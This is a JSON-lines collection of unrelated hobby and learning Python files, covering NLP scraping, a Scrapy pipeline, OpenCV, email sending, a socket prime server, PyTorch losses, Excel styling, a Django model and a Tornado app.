+{"seq_id":"182004615","text":"import re\nfrom collections import Counter\nfrom pprint import pprint\n\nimport en_core_web_sm\nimport requests\nimport spacy\nfrom bs4 import BeautifulSoup\nfrom spacy import displacy\n\nnlp = en_core_web_sm.load()\n\n\ndef url_to_string(url):\n res = requests.get(url)\n html = res.text\n soup = BeautifulSoup(html, 'html.parser')\n for script in soup([\"script\", \"style\", 'aside']):\n script.extract()\n return \" \".join(re.split(r'[\\n\\t]+', soup.get_text()))\n\n\nny_bb = url_to_string(\n 'https://en.wikipedia.org/wiki/Lysistrata'\n)\nprint(ny_bb)\narticle = nlp(ny_bb)\nprint(len(article.ents))\nlabels = [x.label_ for x in article.ents]\npprint(Counter(labels))\n\nitems = [x.text for x in article.ents]\npprint(Counter(items).most_common(3))\n\n\n# Random Sentance\nsentences = [x for x in article.sents]\nsen = sentences[100]\n\n# Highlite IOB\n# displacy.serve(nlp(str(sen)), style='ent')\n\n# Tree View\n# displacy.serve(\n# nlp(str(sen)),\n# style='dep',\n# options={'distance': 120}\n# )\n\n\na = [(x.orth_, x.pos_, x.lemma_) for x in [y\n for y\n in nlp(str(sen))\n if not y.is_stop and y.pos_ != 'PUNCT']]\n\nb = dict([(str(x), x.label_) for x in nlp(str(sentences[20])).ents])\n\nprint([(x, x.ent_iob_, x.ent_type_) for x in sentences[20]])\n\ndisplacy.serve(article, style='ent', port=4999)\n","sub_path":"name_entity_recognition/article_extraction.py","file_name":"article_extraction.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"72589624","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport pandas as pd\nulist=list()\nclass LiepinPipeline:\n def process_item(self, item, spider):\n df=pd.DataFrame(item[\"liepin_xueli\"]).rename(columns={0:\"学历\"})\n df[\"经验\"]=item[\"liepin_jingyan\"]\n df[\"薪水\"]=item[\"job_xinshui\"]\n df[\"职称\"]=item[\"job_zhicheng\"]\n df[\"公司名称\"]=item[\"job_company_name\"]\n df[\"链接\"]=item[\"job_url\"]\n df[\"公司链接\"]=item[\"job_company_url\"]\n self.addition(df)\n #df.to_excel(\"liepin_job.xlsx\")\n# df1=list()\n# df1.append(item[\"liepin_job\"],ignore_index=True)\n# print(df1) \n #print(type(item[\"liepin_job\"]))\n# df_all=pd.concat(item[\"liepin_job\"])\n# print(df_all)\n# for x in item[\"liepin_job\"]:\n \n# df=pd.DataFrame(item[\"liepin_job\"]\n \n #return df\n def addition(self,df):\n #print(df,\"不知道是不是为空喔\")\n ulist.append(df)\n #print(ulist) \n df_合并=pd.concat(ulist)\n #print(df_合并)\n df_合并.to_excel(\"猎聘网数据分析相关岗位信息.xlsx\")\n# return df_合并\n #ulist=list()\n","sub_path":"liepin/liepin/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"599168089","text":"import pytest\n\nfrom topic_05_data_structure.hw.zip_1_names import zip_names\n\nparams = [\n (None, None, 'First arg must be list!'),\n (0, (1, 2, 3), 'First arg must be list!'),\n ('0', (1, 2, 3), 'First arg must be list!'),\n\n ([], None, 'Second arg must be set!'),\n ([], 0, 'Second arg must be set!'),\n ([], '0', 'Second arg must be set!'),\n\n ([], set(), 'Empty list!'),\n ([1], set(), 'Empty set!'),\n\n (['Rose'], {'Black'}, [('Rose', 'Black')]),\n (['Rose', 'White'], {'Black'}, [('Rose', 'Black')]),\n (['Rose', 'Mark'], {'Black', 'Pink'}, [('Rose', 'Pink'), ('Mark', 'Black')]),\n]\n\nids = [\"name_list: %s | surname_set: %s => %s\" % (name_list, surname_set, expected) for\n (name_list, surname_set, expected) in params]\n\n\ndef unpack_zipped_list(zipped_list: list):\n all_items = []\n for tuple_tmp in zipped_list:\n for item in tuple_tmp:\n all_items.append(item)\n return all_items\n\n\n@pytest.mark.parametrize(argnames=\"name_list, surname_set, expected\",\n argvalues=params,\n ids=ids)\ndef test_zip_names(name_list, surname_set, expected):\n if type(expected) == str:\n assert zip_names(name_list, surname_set) == expected\n else:\n result = zip_names(name_list, surname_set)\n assert len(result) == len(expected)\n\n all_expected = unpack_zipped_list(expected)\n all_results = unpack_zipped_list(result)\n\n for exp_item in all_expected:\n assert exp_item in all_results\n","sub_path":"topic_05_data_structure/hw/tests/zip_1_names_test.py","file_name":"zip_1_names_test.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"125481221","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n#可以跟踪目标hsv色彩空间\n\ndef create_mask(image):\n mask = image[175:190, 175:195]\n cv2.imshow(\"mask\", mask)\n cv2.imwrite(\"C:/Users/yangchao/Desktop/OpenCV/picture/mask.jpg\", mask)\n\n\ndef hist2d_demo(image):\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n hist = cv2.calcHist(image, [0, 1], None, [180, 256], [0, 180, 0, 256])\n # cv2.imshow(\"hist2d\", hist)\n plt.imshow(hist, interpolation=\"nearest\")\n plt.title(\"hist2d\")\n plt.show()\n\ndef roi_hist():\n sample = cv2.imread(\"C:/Users/yangchao/Desktop/OpenCV/picture/mask.jpg\")\n target = cv2.imread(\"C:/Users/yangchao/Desktop/OpenCV/picture/1.jpg\")\n\n cv2.imshow(\"sample\", sample)\n cv2.imshow(\"target\", target)\n\n roi_hsv = cv2.cvtColor(sample, cv2.COLOR_BGR2HSV)\n target_hsv = cv2.cvtColor(target, cv2.COLOR_BGR2HSV)\n\n roiHist = cv2.calcHist([roi_hsv], [0, 1], None, [180, 256], [0,180, 0, 256])\n cv2.normalize(roiHist, roiHist, 0, 256, cv2.NORM_MINMAX)\n dst = cv2.calcBackProject([target_hsv], [0, 1], roiHist, [0, 180,0, 256], 1)\n cv2.imshow(\"roi_hist\", dst)\n\n\n\n\n\n#image = cv2.imread(\"C:/Users/yangchao/Desktop/OpenCV/picture/1.jpg\")\n#src = cv2.imread(\"C:/Users/yangchao/Desktop/OpenCV/picture/mask.jpg\")\n#cv2.imshow(\"image\", image)\n#cv2.imshow(\"mask\", src)\nroi_hist()\nc = cv2.waitKey(0)\nif c == 27:\n cv2.destroyAllWindows()\n","sub_path":"untitled1/直方图方向投影.py","file_name":"直方图方向投影.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"89287481","text":"import smtplib\nimport configparser\n\nfrom email.header import Header\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\n\n\n#class Mail(object):\nclass Mail():\n \"\"\"Email Sender Class\"\"\"\n\n def __init__(self):\n config = configparser.ConfigParser()\n config.read('config.ini')\n self.mail_host = config['SETTINGS']['mail_host']\n self.mail_port = config['SETTINGS']['mail_port']\n self.mail_user = config['SETTINGS']['mail_user']\n self.mail_password = config['SETTINGS']['mail_password']\n\n self.mail_sender = config['SETTINGS']['mail_sender']\n\n\n #self.MailSubject = ''\n #self.MailFrom = ''\n #self.MailTo = ''\n #self.MailBody = ''\n\n\n\n def contains_non_ascii_characters(self, str):\n return not all(ord(c) < 128 for c in str) \n\n def add_header(self, message, header_name, header_value):\n if self.contains_non_ascii_characters(header_value):\n h = Header(header_value, 'utf-8')\n message[header_name] = h\n else:\n message[header_name] = header_value \n return message\n\n\n def SendMail(self, mailTo, mailSubject, mailBody):\n \n try:\n\n msg = MIMEMultipart('alternative')\n msg = self.add_header(msg, 'Subject', mailSubject)\n\n #if contains_non_ascii_characters(html):\n # html_text = MIMEText(html.encode('utf-8'), 'html','utf-8')\n #else:\n # html_text = MIMEText(html, 'html') \n\n if(self.contains_non_ascii_characters(mailBody)):\n plain_text = MIMEText(mailBody.encode('utf-8'),'plain','utf-8') \n else:\n plain_text = MIMEText(mailBody,'plain')\n\n msg.attach(plain_text)\n #msg.attach(html_text)\n\n\n\n\n\n\n\n\n string ='\\r\\n'\n # Prepare actual message body\n Body = string.join((\n \"From: %s\" % self.mail_sender,\n \"To: %s\" % mailTo,\n \"Subject: %s\" % mailSubject,\n \"\",\n mailBody\n ))\n\n server = smtplib.SMTP(self.mail_host, self.mail_port) #Port for TLS/STARTTLS\n #server = smtplib.SMTP(\"smtp.gmail.com\", 465) #Port for SSL\n\n server.ehlo()\n server.starttls()\n\n\n server.login(self.mail_user, self.mail_password)\n\n\n server.sendmail(self.mail_sender, mailTo, str(msg))\n server.close()\n print ('successfully sent the mail')\n\n\n except Exception as e:\n print (\"failed to send mail.\"+str(e))\n\n","sub_path":"libs/MailSenderUnicode.py","file_name":"MailSenderUnicode.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"494818974","text":"user2 ={\n 'name':'sanskar jain',\n 'age':20,\n 'learning now':['programming','living','engg'],\n }\nd=dict.fromkeys(['name','age','height'],'unknown')\nprint(d)\nd=dict.fromkeys(\"abc\",'unknown')\nprint(d)\nprint(user2.get('name'))\nprint(user2.get('names'))\n\nd.clear()\nprint(d)\nus1=user2.copy()\nprint(us1)\nprint(us1 is user2)\nu1=user2\nprint(u1 is user2)\nprint(user2.get('name1','not found'))\nuser2 ={\n 'name':'sanskar jain',\n 'age':20,\n 'learning now':['programming','living','engg'],\n 'name':'samins'\n }\nprint(user2)\n","sub_path":"python/dict53.py","file_name":"dict53.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"81147773","text":"import win32com.client as win32\nfrom win32com.client import Dispatch\nimport os\n\n\n# This portion deals with the mail part\noutlook = win32.Dispatch('outlook.application')\n# Workaround to send the mail from a different mail id----------- skip this part if you want to send mail from your default mail box\nsendfromAC = None\nfor oacc in outlook.Session.Accounts:\n if oacc.SmtpAddress == \"karol.sawicki@example.com\": # Mail id from which to send the mail\n sendfromAC = oacc\n break\n # ----------------------------------------------------------------\n\nmail = outlook.CreateItem(0)\n\n # ----------------------------------------------------------------\nif sendfromAC:\n # Msg.SendUsingAccount = oacctouse\n mail._oleobj_.Invoke(*(64209, 0, 8, 0, sendfromAC))\n # ----------------------------------------------------------------\n \n \n \n mail.To = 'CONFIDENTIAL@example.com;'\n mail.Cc = 'CONFIDENTIAL@example.com;'\n mail.Subject = '[CONFIDENTIAL] CONFIDENTIAL'\n\n mail.HTMLBody = mail.HTMLBody + \"
Cześć, \" \\\n + \"
Noc spokojna, kolejka czysta. \"\\\n + \"
Pozdrawiam / Regards\"\\\n + \"
Karol Sawicki \"\\\n + \"
CONFIDENTIAL\"\\\n + \"
CONFIDENTIAL\"\\\n + \"
CONFIDENTIAL\"\\\n + \"
e-mail: CONFIDENTIAL\"\n \n mail.Display(False)","sub_path":"MorningMail2.py","file_name":"MorningMail2.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"369217060","text":"### 对excel数据作相关分析-统计全部数据\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom tqdm import tqdm\r\nfrom scipy.spatial.distance import pdist\r\n\r\n\r\nexcel_folder = \"example\"\r\nexcels = os.listdir(excel_folder)\r\nif not os.path.exists(\"results\"):\r\n\tos.mkdir(\"results\")\r\n\r\nfor excel in tqdm(excels):\r\n\tdf = pd.read_excel(excel_folder+\"/\"+excel) # 默认第一个sheet\r\n\t# 参数定义\r\n\tnum_pairs = 0 # 一共多少对距离相关\r\n\tcompound1 = []\r\n\tcompound2 = []\r\n\tcorrelation = []\r\n\r\n\t# 计算相关系数的绝对值\r\n\tcompounds = list(df[\"Compound\"]) # 所有的物质名称\r\n\tfor index1, comp1 in enumerate(compounds): # index1:第一种物质全局标号\r\n\t\tfor index, comp2 in enumerate(compounds[index1+1:]):\r\n\t\t\tindex2 = index1 + index + 1 # 第二种物质的全���标号\r\n\t\t\tdata1 = list(df.loc[index1])[1:]\r\n\t\t\tdata2 = list(df.loc[index2])[1:]\r\n\t\t\tcorr_dis = pdist(np.vstack([data1, data2]), 'correlation') # 相关距离,结果类似array([-1.])\r\n\t\t\tcorr = abs((1 - corr_dis)[0])\r\n\r\n\t\t\t# 统计结果\r\n\t\t\tnum_pairs += 1\r\n\t\t\tif index == 0:\r\n\t\t\t\tcompound1.append(comp1)\r\n\t\t\telse:\r\n\t\t\t\tcompound1.append(\"\")\r\n\t\t\tcompound2.append(comp2)\r\n\t\t\tcorrelation.append(corr)\r\n\r\n\t# 输出数据\r\n\twriter = pd.ExcelWriter(\"results/result_\" + excel)\r\n\tdata = {\"compound1\":compound1, \"compound2\":compound2, \"correlation\":correlation}\r\n\toutput_data = pd.DataFrame(data, columns=['compound1','compound2','correlation'])\r\n\toutput_data.to_excel(writer, 'Sheet1', index=False) # 不输出行标号\r\n\twriter.save()\r\n\r\n\tprint(\"%s: 共处理%d种物质, 计算%d个相关对.\"%(excel, len(compounds), num_pairs))\r\n\r\n# 所有excel处理完毕\r\nprint(\"All done!\")\r\n","sub_path":"1.excel_data_correlation_analysis/handle.py","file_name":"handle.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"485787301","text":"import numpy as np\nimport ipcv\n\ndef idft2(F, scale=False):\n\t\"\"\"\n\tTitle:\n\t\tidft2\n\tDescription:\n\t\tPerforms an Inverse Discrete Fourier Transform on given 2D array\n\tAttributes:\n\t\tf - 2D ndarray to be transformed\n\t\tscale - if true, divide by length of signal\n\tAuthor:\n\t\tMolly Hill, mmh5847@rit.edu\n\t\"\"\"\n\t#error-checking\n\tif type(F) != np.ndarray:\n\t\traise TypeError(\"Source must be ndarray.\")\n\tif type(scale) != bool:\n\t\tscale = True\n\t\tprint(\"Scale var must be Boolean. Defaulting to True.\")\t\n\tif F.dtype != np.complex128:\n\t\tF = F.astype(np.complex128)\n\t\tprint(\"Converting signal to dtype complex128.\")\n\n\tfr = np.array([])\n\tfc = np.array([])\n\n\tfor r in np.arange(F.shape[0]): #transform one dimension\n\t\tfr = np.append(fr,ipcv.idft(F[r],scale))\n\tfr = np.reshape(fr,F.shape)\n\tfor c in np.arange(F.shape[1]): #transform other dimension\n\t\tfc = np.append(fc,ipcv.idft(fr[:,c],scale))\n\tftrans = np.reshape(fc,F.shape)\n\n\treturn ftrans\n\nif __name__ == '__main__':\n\timport numerical\n\timport numpy\n\timport time\n\n\tM = 2**5\n\tN = 2**5\n\tF = numpy.zeros((M,N), dtype=numpy.complex128)\n\tF[0,0] = 1\n\n\trepeats = 10\n\tprint('Repetitions = {0}'.format(repeats))\n\n\tstartTime = time.clock()\n\tfor repeat in range(repeats):\n\t\tf = numerical.idft2(F)\n\tstring = 'Average time per transform = {0:.8f} [s] '\n\tstring += '({1}x{2}-point iDFT2)'\n\tprint(string.format((time.clock() - startTime)/repeats, M, N))\n\n\tstartTime = time.clock()\n\tfor repeat in range(repeats):\n\t\tf = numpy.fft.ifft2(F)\n\tstring = 'Average time per transform = {0:.8f} [s] '\n\tstring += '({1}x{2}-point iFFT2)'\n\tprint(string.format((time.clock() - startTime)/repeats, M, N))\n","sub_path":"idft2.py","file_name":"idft2.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"509433797","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 12 14:11:57 2016\n\n@author: berend\n\"\"\"\n\n#CCD statistics\n\n#Functions:\n#1. func that subtracts dark field\n#2. func that finds location of peak and makes a list of positions, height and areas (for diagnostics, OK to be slow)\n# loop local max from high to low (highest local max is global max!)\n# - find local max\n# - find area in a pixel mask centered around that local max\n# - integrate intens\n# - make it zero in the mask\n# - iterate\n#3. func that replaces all those by a single pix\n#Idea to do that:\n# - remove CCD BG\n# - remove 5% max thresh\n# - iterate over maxima with pixel mask, replace peak with uniform Gaussian\n\n\n# dark field subtraction: DF can be averaged over columns and then expanded back to DF\n\n#Find peak halo info by adding up a bunch of peaks and averaging to get the halo out of the background\n#Make a library of different peaks, do statistics on their width, FWHM, height\n#Find out how many counts you actually get with a certain \"countrate\"\n#A gaussian seems to describe the peak fairly well\n\n\n\n\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt\nimport time\nimport ImPr as impr\nimport os\n\n\n\n\n\ndef loadUBCData(path):\n with open(path, 'rb') as f:\n bytestring = f.read()\n \n size = 1376*1024\n\n data1D=np.array(struct.unpack('%sf' % size,bytestring))\n\n\n data=np.empty((1376, 1024))\n\n for ii in range(1024):\n for jj in range(1376):\n data[jj,ii] = data1D[ii*1376+jj]\n \n return data\n\n\ndef loadUBCRAW(path):\n with open(path, 'r') as f:\n datastring = f.read().split('\\n')[2:]\n \n data=np.empty((1376, 1024))\n \n \n for i in range(1024):\n data[:,i] = np.array(list(map(float,datastring[i].split('\\t'))))\n \n return data\n \n#this seems like a reasonable way to implement a BG correction, it's fairly smooth\n# if you subtract the correction image from the original data \ndef makeDFCorrection(DFdata):\n \"\"\"DFdata is a np array containing a DF image, returns averaged array over columns\"\"\"\n DFcorrection = np.array(DFdata) # create new array \n DFline = np.sum(DFdata, axis = 1)/1024.\n for i in range(1024):\n DFcorrection[:,i] = DFline\n \n return DFcorrection\n \n\n\ndef digitize(A, thresh):\n \"\"\"return 1 if A[i,j] greater then thresh*A.max(), else return 0\"\"\"\n Thresh = thresh * A.max()\n return np.where(np.greater(A, Thresh),1,0)\n\n \ndef implot(data):\n fig, ax = plt.subplots(figsize=(10,10))\n ax.imshow(data, cmap = 'afmhot', extent = [0,1024,0,1376], aspect=1)\n \n \ndef timefunc(func, *args, n = 100):\n t0 = time.time()\n for i in range(n): \n out = func(*args)\n t1 = time.time()\n print('Execution time: %s' % ((t1-t0)/n))\n \n return ((t1-t0)/n, out)\n \n \n\ndef getnbrs(i, A):\n \"\"\"return list of neighbors of i that are nonzero\"\"\"\n (x,y) = itoxy(i,A)\n nbrs = []\n if((A[x+1,y]>0) & (x0) & (x>0)):\n nbrs.append(xytoi((x-1, y),A))\n if((A[x,y+1]>0) & (y0)&(y>0)):\n nbrs.append(xytoi((x, y-1),A))\n \n return nbrs\n \ndef itoxy(i, A):\n \"\"\"go from index i to tuple (x,y)\"\"\"\n return (i%A.shape[1],int(i/A.shape[1]))\n \ndef xytoi(tup, A):\n \"\"\"go from tuple tup = (x,y) to i\"\"\"\n return tup[1]*A.shape[1]+tup[0]\n\ndef find_un(l):\n \"\"\"return list only keeping unique elements of sorted list l\"\"\"\n l.sort()\n i = 0\n while (i < (len(l)-1)):\n if(l[i] == l[i+1]):\n l.pop(i)\n else:\n i+=1\n return l\n \ndef MarkClusters(A):\n \"\"\"return array of labelled clusters\"\"\"\n #Make copy of A to set zeros\n B = np.array(A)\n #Make another copy to mark clusters\n C = np.array(B)\n startval = 1 #starting label\n inc = 1 #increment\n index = []\n n_obj = 0\n label = startval\n \n for i in range(B.shape[0]):\n for j in range(B.shape[1]):\n if B[i,j] == 1: #found cluster\n n_obj += 1\n index.append(xytoi((i,j),B))\n while not isempty(index):\n B[itoxy(index[0],B)] = 0 #remove point from original\n C[itoxy(index[0],B)] = label #label the connected matrix\n nbrs = getnbrs(index.pop(0), B) # get neighbors\n index += nbrs #add to index\n index = find_un(index)\n label += inc\n \n return C\n \n \n \n \ndef isempty(l):\n \"\"\"checks if a list is empty\"\"\"\n return (len(l) == 0)\n \n\ndef writepeaks(peaks, dirname):\n os.mkdir(dirname)\n \n for i in range(len(peaks)):\n name = 'peak%s' % i\n np.savetxt((dirname + '/m' + name), peaks[i])\n\ndef writepeakstats(peakdistr, outname):\n np.savetxt(outname, peakdistr)\n \n \n \n\n \ndef tempfunc(datacor, databu, DFcor):\n datacor = databu-DFcor\n \n\ndef tempfunc2(datacor, databu, DFcor, outdata):\n datacor = databu-DFcor\n im.py_find_im_regions(datacor, outdata)\n \n\nim = impr.ImPr()\nrawdata = loadUBCData('singleevents')\nrawdata2 = loadUBCData('singleevents2')\nrawdata3 = loadUBCData('singleevents3')\ndf = loadUBCRAW('darkfield.raw')\ndfcor = makeDFCorrection(df)\ndatabu = rawdata-dfcor\ndata = np.array(databu)\n#datacut = np.array(data[400:600,400:600])\npeakdistr = np.array(im.py_get_im_peak_stats(data, thresh = 10.0))\npeaks = im.get_im_peaks(data, thresh = 10.0, size = 15)\n#peakdistr_th = np.array(im.py_get_im_peak_stats(rawdata, thresh = 86.0))\ndata2 = rawdata2 - dfcor\ndata3 = rawdata3 - dfcor\n#\npeakdistr2 = np.array(im.py_get_im_peak_stats(data2, thresh = 10.0))\n##peakdistr_th2 = np.array(im.py_get_im_peak_stats(rawdata2, thresh = 86.0))\npeaks2 = im.get_im_peaks(data2, thresh = 10.0, size = 15)\n#\n#\npeakdistr3 = np.array(im.py_get_im_peak_stats(data3, thresh = 10.0))\n##peakdistr_th3 = np.array(im.py_get_im_peak_stats(rawdata3, thresh = 86.0))\npeaks3 = im.get_im_peaks(data3, thresh = 10.0, size = 15)\n\n#plt.hist(peakdistr[:,2])\n#plt.show()\n\n#peaksXY = np.array(im.py_find_im_peaks(datacut, thresh = 10.0))\n#peaksXY.T\n#fig, ax = plt.subplots(figsize=(6,6))\n#ax.imshow(data[400:600,400:600], extent = [0,200,200,0])\n#plt.plot(peaksXY.T[1], peaksXY.T[0], linestyle = 'none', marker = 'x', color = 'red')\n#\n#\n\n","sub_path":"CCDstat.py","file_name":"CCDstat.py","file_ext":"py","file_size_in_byte":6422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"327210083","text":"#!/usr/bin/env python3\nimport socket\nimport pickle\nimport multiprocessing\nimport zlib\n\nHOST = ''\nPORT = 2424\n\n\ndef primos(inicio, final):\n numeros_primos = list()\n for num in range(inicio,final+1):\n if num > 1:\n for i in range(2,num):\n if(num % i == 0):\n break\n else:\n numeros_primos.append(num)\n return numeros_primos\n\n\ndef main ():\n c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n c.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n c.bind((HOST, PORT))\n c.listen(10)\n print(\"Esperando conexion en puerto %d\" % PORT)\n while True:\n current, address = c.accept()\n print(\"Conectado a %s\" % address[0])\n\n while True:\n data = current.recv(2048)\n if data == \"stop\":\n current.shutdown(1)\n current.close()\n exit()\n else:\n rango = data.split(b\",\")\n print(rango)\n inicio = int(rango[0])\n final = int(rango[1])\n\n if final > 7500:\n print(\"Procesando primos entre %d y %d\" % (inicio, final))\n list_ents = []\n for i in range(inicio,final,7500):\n list_ents.append(i)\n for i,e in enumerate(list_ents[:-1]):\n bgn = e\n end = list_ents[i+1]\n list_primes = primos(bgn,end)\n data = pickle.dumps(list_primes)\n z = zlib.compress(data)\n current.sendall(z)\n\n\n else:\n print(\"Procesando primos entre %d y %d\" % (inicio, final))\n lista = primos(inicio, final)\n data = pickle.dumps(lista)\n z = zlib.compress(data)\n current.sendall(z)\n\n\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass","sub_path":"Trabajos Python/primes multy/primes_server_multy.py","file_name":"primes_server_multy.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"574511326","text":"import torch\nimport torch.nn as nn\n\n\nclass Discrete_CELoss(nn.Module):\n def __init__(self, granularity):\n super(Discrete_CELoss, self).__init__()\n self.granularity = granularity / 10\n self.criterion = torch.nn.CrossEntropyLoss()\n\n def forward(self, x, gt):\n gt = gt * self.granularity\n int_gt = gt.type(torch.cuda.LongTensor)[0]\n return self.criterion(x, int_gt)\n\n\nclass CombinedLoss(nn.Module):\n def __init__(self, conv, writer, granularity=100):\n super(CombinedLoss, self).__init__()\n self.conv = conv\n self.granularity = granularity / 10\n self.writer = writer\n self.criterion1 = torch.nn.CrossEntropyLoss()\n self.criterion2 = torch.nn.MSELoss()\n\n def forward(self, x, gt):\n gt = gt * self.granularity\n int_gt = gt.type(torch.cuda.LongTensor)[0]\n loss1 = self.criterion1(x, int_gt)\n # int_x = torch.unsqueeze(x.max(dim=1)[1], 1).type(torch.cuda.FloatTensor)\n est_x = self.conv(x)\n loss2 = self.criterion2(est_x, gt)\n self.writer.add_scalar('train_loss/CE', loss1.item())\n self.writer.add_scalar('train_loss/MSE', loss2.item())\n return loss1 + 0.1 * loss2\n\n\nclass LogDepthLoss(nn.Module):\n def __init__(self):\n super(LogDepthLoss, self).__init__()\n\n def forward(self, x, gt):\n N = x.size(2) * x.size(3)\n d = x.log() - gt.log()\n ddx = torch.zeros(x.size()).cuda()\n ddy = torch.zeros(x.size()).cuda()\n ddx[:,:,:-1,:] = d[:,:,1:,:] - d[:,:,:-1,:]\n ddy[:,:,:,:-1] = d[:,:,:,1:] - d[:,:,:,:-1]\n loss = 1/N**2 * torch.sum(d**2, dim=(2, 3)) - 1/(2*N**2) * d.sum(dim=(2,3))**2 + 1/N * (ddx**2 + ddy**2).sum(dim=(2,3))\n return loss.mean()\n","sub_path":"loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"642479696","text":"# coding:utf-8\nfrom openpyxl.styles import PatternFill, Style, Color, Border, Side, Font, Alignment, Protection, colors as op_colors\nimport re\n\nclass Styler(object):\n \"\"\"\n Creates openpyxl Style to be applied\n \"\"\"\n def __init__(self, bg_color='white', bold=False, font_size=12, font_color='black', number_format='General',\n protection=False, underline=None):\n self.bold = bold\n self.font_size = font_size\n self.font_color = font_color\n self.number_format = number_format\n self.protection = protection\n self.underline = underline\n\n if bg_color.startswith('#'):\n bg_color = bg_color[1:]\n if self.is_string_is_hex_color_code(hex_string=bg_color):\n self.bg_color = bg_color\n else:\n self.bg_color = colors.get(bg_color, colors.white)\n\n if font_color.startswith('#'):\n font_color = font_color[1:]\n if self.is_string_is_hex_color_code(hex_string=font_color):\n self.font_color = font_color\n else:\n self.font_color = colors.get(self.font_color, colors.black)\n\n def create_style(self):\n side = Side(border_style='thin', color=colors.black)\n border = Border(left=side, right=side, top=side, bottom=side)\n return Style(font=Font(name=\"Arial\", size=self.font_size, color=Color(self.font_color),\n bold=self.bold, underline=self.underline),\n fill=PatternFill(patternType='solid', fgColor=self.bg_color),\n alignment=Alignment(horizontal='center', vertical='center', wrap_text=True, shrink_to_fit=True, indent=0),\n border=border,\n number_format=self.number_format,\n protection=Protection(locked=self.protection))\n\n def is_string_is_hex_color_code(self, hex_string):\n if re.search(r'[a-fA-F0-9]{6}$', hex_string):\n return True\n else:\n return False\n\n\ndef not_supported(*args, **kwargs):\n raise NotImplementedError('ImmutableDict is immutable')\n\n\nclass ImmutableDict(dict):\n __delitem__ = not_supported\n __setitem__ = not_supported\n __setattr__ = not_supported\n update = not_supported\n clear = not_supported\n pop = not_supported\n popitem = not_supported\n\n def __getattr__(self, item):\n return self[item]\n\nnumber_formats = ImmutableDict(general='General', date='DD/MM/YY', percent='0.0%', time_24_hours='HH:MM',\n time_12_hours='h:MM AM/PM', date_time='DD/MM/YY HH:MM',\n thousands_comma_sep='#,##0')\n\ncolors = ImmutableDict(white='FFFFFF', blue=op_colors.BLUE, yellow=op_colors.YELLOW, green=op_colors.GREEN,\n black=op_colors.BLACK, red=op_colors.RED, purple='800080', grey='D3D3D3',)\n","sub_path":"StyleFrame/styler.py","file_name":"styler.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"57926158","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\n\nclass User(AbstractUser):\n friends = models.ManyToManyField(\"User\", blank=True)\n image = models.ImageField(upload_to='profile_images')\n dark_mode = models.BooleanField(default=True)\n def __str__(self):\n return self.username\n\n# Create your models here.\nclass Friend_Request(models.Model):\n from_user = models.ForeignKey(\n User, related_name='from_user', on_delete=models.CASCADE\n )\n to_user = models.ForeignKey(\n User, related_name='to_user', on_delete=models.CASCADE\n )\n\n","sub_path":"pitch_proto/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"344791957","text":"import tornado.web\nimport tornado.ioloop\nimport tornado.httpserver\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.write(\"Hellow, world\")\n\n\ndef make_app():\n return tornado.web.Application([\n (r\"/\", MainHandler)\n ])\n\n\nif __name__ == '__main__':\n app = make_app()\n # app.listen(8888)\n server = tornado.httpserver.HTTPServer(app)\n server.bind(8888)\n server.start(0)\n tornado.ioloop.IOLoop.current().start()\n","sub_path":"python/demo/tornado_demo/tornado_demo.py","file_name":"tornado_demo.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
